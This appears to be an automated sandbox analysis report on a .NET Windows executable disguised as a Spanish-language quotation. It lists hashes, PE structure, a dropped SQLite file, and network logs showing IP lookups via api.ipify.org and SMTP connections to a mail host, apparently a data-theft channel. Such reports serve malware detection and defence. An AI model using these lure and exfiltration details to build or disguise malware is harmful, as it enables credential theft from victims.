                                      SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                      MD5:8C31C5487A97BBE73711C5E20600C1F6
                                      SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                      SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                      SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                      Category:dropped
                                      Size (bytes):28672
                                      Entropy (8bit):0.4393511334109407
                                      Encrypted:false
                                      SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                      MD5:8C31C5487A97BBE73711C5E20600C1F6
                                      SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                      SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                      SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):5.657091218519326
                                      TrID:
                                      • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                      • Win64 Executable GUI (202006/5) 46.43%
                                      • Win64 Executable (generic) (12005/4) 2.76%
                                      • Generic Win/DOS Executable (2004/3) 0.46%
                                      • DOS Executable Generic (2002/1) 0.46%
                                      File name:cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                                      File size:2820096
                                      MD5:38b3d465545a56ea977ba43dcda97b16
                                      SHA1:e8fc4cb22b0a7e6f24c762b9bd809c8f10a82a84
                                      SHA256:89b5371841e3eb63f290b60717e55ddfc8518803e14419d5c9ad3a6bf111c2c8
                                      SHA512:f7966e2904f379fc816cd2326b2ae92d9a92fc28bd59784f64d796486124708ca238134ef0c3bfe892cdea71ac650b2db82209de20378e84544162dcb2774ecc
                                      SSDEEP:49152:rkvBmg2iRQHsne0LqnefX5qDRYVKSFzY7RlW:
                                      TLSH:F1D5BFF286E3FEC4976F1D4480043A409C14286757BC96D8FDCA2A9793E5578EF9CAB0
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...(x.d..........".......*.............. ....@...... .......................@+...........`................................
                                      Icon Hash:e4c4c98d888a8c84
                                      Entrypoint:0x400000
                                      Entrypoint Section:
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x64187828 [Mon Mar 20 15:13:44 2023 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:
                                      Instruction
                                      dec ebp
                                      pop edx
                                      nop
                                      add byte ptr [ebx], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+eax], al
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2b20000xaba.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x2af9a00x2afa00unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x2b20000xaba0xc00False0.3717447916666667data4.390839617565074IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x2b206c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m
                                      RT_GROUP_ICON0x2b25100x14data
                                      RT_VERSION0x2b25600x334data
                                      RT_MANIFEST0x2b28d00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 20, 2023 17:39:56.669282913 CET49701443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:39:56.669332981 CET44349701173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:39:56.669426918 CET49701443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:39:56.726285934 CET49701443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:39:56.726321936 CET44349701173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:39:57.387532949 CET44349701173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:39:57.387809992 CET49701443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:39:57.392326117 CET49701443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:39:57.392350912 CET44349701173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:39:57.392920971 CET44349701173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:39:57.439963102 CET49701443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:39:57.696048975 CET49701443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:39:57.696083069 CET44349701173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:39:57.852972984 CET44349701173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:39:57.853099108 CET44349701173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:39:57.853147984 CET49701443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:39:57.854619980 CET49701443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:40:04.815226078 CET49702587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:05.004029989 CET58749702208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:05.004136086 CET49702587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:08.110202074 CET58749702208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:08.127775908 CET49702587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:08.316179037 CET58749702208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:08.316483021 CET58749702208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:08.327778101 CET49702587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:08.519423962 CET58749702208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:08.520431042 CET49702587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:08.714994907 CET58749702208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:08.715282917 CET49702587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:08.905705929 CET58749702208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:08.906233072 CET49702587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:09.117255926 CET58749702208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:09.171610117 CET49702587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:09.361411095 CET58749702208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:09.361480951 CET49702587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:09.723177910 CET49703587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:09.908612013 CET58749703208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:09.908730984 CET49703587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:10.203640938 CET58749703208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:10.205693960 CET49703587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:10.390846014 CET58749703208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:10.390954971 CET58749703208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:10.391586065 CET49703587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:10.581511021 CET58749703208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:10.582748890 CET49703587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:10.774342060 CET58749703208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:10.774724960 CET49703587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:10.962038994 CET58749703208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:10.981431007 CET49703587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:11.190886021 CET58749703208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:11.191459894 CET49703587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:11.377685070 CET58749703208.91.199.224192.168.2.7
                                      Mar 20, 2023 17:40:11.378108978 CET49703587192.168.2.7208.91.199.224
                                      Mar 20, 2023 17:40:18.414599895 CET49704443192.168.2.7104.237.62.211
                                      Mar 20, 2023 17:40:18.414643049 CET44349704104.237.62.211192.168.2.7
                                      Mar 20, 2023 17:40:18.414855003 CET49704443192.168.2.7104.237.62.211
                                      Mar 20, 2023 17:40:18.430782080 CET49704443192.168.2.7104.237.62.211
                                      Mar 20, 2023 17:40:18.430807114 CET44349704104.237.62.211192.168.2.7
                                      Mar 20, 2023 17:40:26.106579065 CET44349704104.237.62.211192.168.2.7
                                      Mar 20, 2023 17:40:26.106766939 CET49704443192.168.2.7104.237.62.211
                                      Mar 20, 2023 17:40:26.125121117 CET49704443192.168.2.7104.237.62.211
                                      Mar 20, 2023 17:40:26.125145912 CET44349704104.237.62.211192.168.2.7
                                      Mar 20, 2023 17:40:26.125679016 CET44349704104.237.62.211192.168.2.7
                                      Mar 20, 2023 17:40:26.330744028 CET44349704104.237.62.211192.168.2.7
                                      Mar 20, 2023 17:40:26.330925941 CET49704443192.168.2.7104.237.62.211
                                      Mar 20, 2023 17:40:27.516333103 CET49704443192.168.2.7104.237.62.211
                                      Mar 20, 2023 17:40:27.516372919 CET44349704104.237.62.211192.168.2.7
                                      Mar 20, 2023 17:40:27.713243961 CET44349704104.237.62.211192.168.2.7
                                      Mar 20, 2023 17:40:27.713356972 CET44349704104.237.62.211192.168.2.7
                                      Mar 20, 2023 17:40:27.713546991 CET49704443192.168.2.7104.237.62.211
                                      Mar 20, 2023 17:40:27.715127945 CET49704443192.168.2.7104.237.62.211
                                      Mar 20, 2023 17:40:40.026554108 CET49705443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:40:40.026597023 CET44349705173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:40:40.026799917 CET49705443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:40:40.037029982 CET49705443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:40:40.037056923 CET44349705173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:40:40.680449963 CET44349705173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:40:40.680613041 CET49705443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:40:40.684176922 CET49705443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:40:40.684201956 CET44349705173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:40:40.684712887 CET44349705173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:40:40.724915981 CET49705443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:40:41.198601961 CET49706587192.168.2.7208.91.199.223
                                      Mar 20, 2023 17:40:41.381513119 CET58749706208.91.199.223192.168.2.7
                                      Mar 20, 2023 17:40:41.381638050 CET49706587192.168.2.7208.91.199.223
                                      Mar 20, 2023 17:40:41.440186977 CET49705443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:40:41.440212965 CET44349705173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:40:41.653151035 CET44349705173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:40:41.653278112 CET44349705173.231.16.76192.168.2.7
                                      Mar 20, 2023 17:40:41.653366089 CET49705443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:40:41.654903889 CET49705443192.168.2.7173.231.16.76
                                      Mar 20, 2023 17:40:44.529150009 CET58749706208.91.199.223192.168.2.7
                                      Mar 20, 2023 17:40:44.563363075 CET49706587192.168.2.7208.91.199.223
                                      Mar 20, 2023 17:40:44.746382952 CET58749706208.91.199.223192.168.2.7
                                      Mar 20, 2023 17:40:44.746429920 CET58749706208.91.199.223192.168.2.7
                                      Mar 20, 2023 17:40:44.785456896 CET49706587192.168.2.7208.91.199.223
                                      Mar 20, 2023 17:40:44.970654011 CET58749706208.91.199.223192.168.2.7
                                      Mar 20, 2023 17:40:44.973014116 CET49706587192.168.2.7208.91.199.223
                                      Mar 20, 2023 17:40:45.162275076 CET58749706208.91.199.223192.168.2.7
                                      Mar 20, 2023 17:40:45.162636995 CET49706587192.168.2.7208.91.199.223
                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 20, 2023 17:39:56.587740898 CET5947753192.168.2.78.8.8.8
                                      Mar 20, 2023 17:39:56.607820988 CET53594778.8.8.8192.168.2.7
                                      Mar 20, 2023 17:39:56.633099079 CET5575253192.168.2.78.8.8.8
                                      Mar 20, 2023 17:39:56.652239084 CET53557528.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:03.961097956 CET5033053192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:04.144114971 CET53503308.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:04.616302967 CET5658853192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:04.798839092 CET53565888.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:09.678766966 CET6032653192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:09.698537111 CET53603268.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:09.703830004 CET5083553192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:09.721672058 CET53508358.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:18.320276022 CET5050553192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:18.339459896 CET53505058.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:18.378129959 CET6117853192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:18.397738934 CET53611788.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:39.934139967 CET6392653192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:39.952254057 CET53639268.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:39.967156887 CET5333653192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:39.986788034 CET53533368.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:40.721595049 CET5100753192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:40.906794071 CET53510078.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:40.987206936 CET5051353192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:41.172533035 CET53505138.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:46.855173111 CET6076553192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:47.163551092 CET53607658.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:47.311075926 CET5828353192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:47.330579996 CET53582838.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:59.290258884 CET5002453192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:59.308312893 CET53500248.8.8.8192.168.2.7
                                      Mar 20, 2023 17:40:59.318730116 CET4951653192.168.2.78.8.8.8
                                      Mar 20, 2023 17:40:59.338602066 CET53495168.8.8.8192.168.2.7
                                      Mar 20, 2023 17:41:05.300035000 CET6267953192.168.2.78.8.8.8
                                      Mar 20, 2023 17:41:05.320503950 CET53626798.8.8.8192.168.2.7
                                      Mar 20, 2023 17:41:05.329094887 CET6139253192.168.2.78.8.8.8
                                      Mar 20, 2023 17:41:05.347078085 CET53613928.8.8.8192.168.2.7
                                      Mar 20, 2023 17:41:32.924397945 CET5210453192.168.2.78.8.8.8
                                      Mar 20, 2023 17:41:32.944188118 CET53521048.8.8.8192.168.2.7
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Mar 20, 2023 17:39:56.587740898 CET192.168.2.78.8.8.80x8123Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:39:56.633099079 CET192.168.2.78.8.8.80xc8b1Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:03.961097956 CET192.168.2.78.8.8.80x28bfStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:04.616302967 CET192.168.2.78.8.8.80x9a58Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.678766966 CET192.168.2.78.8.8.80xf237Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.703830004 CET192.168.2.78.8.8.80xdf55Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:18.320276022 CET192.168.2.78.8.8.80x34d2Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:18.378129959 CET192.168.2.78.8.8.80xfde4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:39.934139967 CET192.168.2.78.8.8.80xe30cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:39.967156887 CET192.168.2.78.8.8.80x3420Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:40.721595049 CET192.168.2.78.8.8.80x6d22Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:40.987206936 CET192.168.2.78.8.8.80x4e83Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:46.855173111 CET192.168.2.78.8.8.80x57dbStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:47.311075926 CET192.168.2.78.8.8.80x2bdeStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.290258884 CET192.168.2.78.8.8.80x93c0Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.318730116 CET192.168.2.78.8.8.80x7d9dStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.300035000 CET192.168.2.78.8.8.80x1df5Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.329094887 CET192.168.2.78.8.8.80x92dbStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:32.924397945 CET192.168.2.78.8.8.80x8ddaStandard query (0)168.98.4.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Mar 20, 2023 17:39:56.607820988 CET8.8.8.8192.168.2.70x8123No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:39:56.607820988 CET8.8.8.8192.168.2.70x8123No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:39:56.607820988 CET8.8.8.8192.168.2.70x8123No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:39:56.607820988 CET8.8.8.8192.168.2.70x8123No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:39:56.652239084 CET8.8.8.8192.168.2.70xc8b1No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:39:56.652239084 CET8.8.8.8192.168.2.70xc8b1No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:39:56.652239084 CET8.8.8.8192.168.2.70xc8b1No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:39:56.652239084 CET8.8.8.8192.168.2.70xc8b1No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:04.144114971 CET8.8.8.8192.168.2.70x28bfNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:04.144114971 CET8.8.8.8192.168.2.70x28bfNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:04.144114971 CET8.8.8.8192.168.2.70x28bfNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:04.144114971 CET8.8.8.8192.168.2.70x28bfNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:04.144114971 CET8.8.8.8192.168.2.70x28bfNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:04.798839092 CET8.8.8.8192.168.2.70x9a58No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:04.798839092 CET8.8.8.8192.168.2.70x9a58No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:04.798839092 CET8.8.8.8192.168.2.70x9a58No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:04.798839092 CET8.8.8.8192.168.2.70x9a58No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:04.798839092 CET8.8.8.8192.168.2.70x9a58No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.698537111 CET8.8.8.8192.168.2.70xf237No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.698537111 CET8.8.8.8192.168.2.70xf237No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.698537111 CET8.8.8.8192.168.2.70xf237No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.698537111 CET8.8.8.8192.168.2.70xf237No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.698537111 CET8.8.8.8192.168.2.70xf237No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.721672058 CET8.8.8.8192.168.2.70xdf55No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.721672058 CET8.8.8.8192.168.2.70xdf55No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.721672058 CET8.8.8.8192.168.2.70xdf55No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.721672058 CET8.8.8.8192.168.2.70xdf55No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:09.721672058 CET8.8.8.8192.168.2.70xdf55No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:18.339459896 CET8.8.8.8192.168.2.70x34d2No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:18.339459896 CET8.8.8.8192.168.2.70x34d2No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:18.339459896 CET8.8.8.8192.168.2.70x34d2No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:18.339459896 CET8.8.8.8192.168.2.70x34d2No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:18.397738934 CET8.8.8.8192.168.2.70xfde4No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:18.397738934 CET8.8.8.8192.168.2.70xfde4No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:18.397738934 CET8.8.8.8192.168.2.70xfde4No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:18.397738934 CET8.8.8.8192.168.2.70xfde4No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:39.952254057 CET8.8.8.8192.168.2.70xe30cNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:39.952254057 CET8.8.8.8192.168.2.70xe30cNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:39.952254057 CET8.8.8.8192.168.2.70xe30cNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:39.952254057 CET8.8.8.8192.168.2.70xe30cNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:39.986788034 CET8.8.8.8192.168.2.70x3420No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:39.986788034 CET8.8.8.8192.168.2.70x3420No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:39.986788034 CET8.8.8.8192.168.2.70x3420No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:39.986788034 CET8.8.8.8192.168.2.70x3420No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:40.906794071 CET8.8.8.8192.168.2.70x6d22No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:40.906794071 CET8.8.8.8192.168.2.70x6d22No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:40.906794071 CET8.8.8.8192.168.2.70x6d22No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:40.906794071 CET8.8.8.8192.168.2.70x6d22No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:40.906794071 CET8.8.8.8192.168.2.70x6d22No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:41.172533035 CET8.8.8.8192.168.2.70x4e83No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:41.172533035 CET8.8.8.8192.168.2.70x4e83No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:41.172533035 CET8.8.8.8192.168.2.70x4e83No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
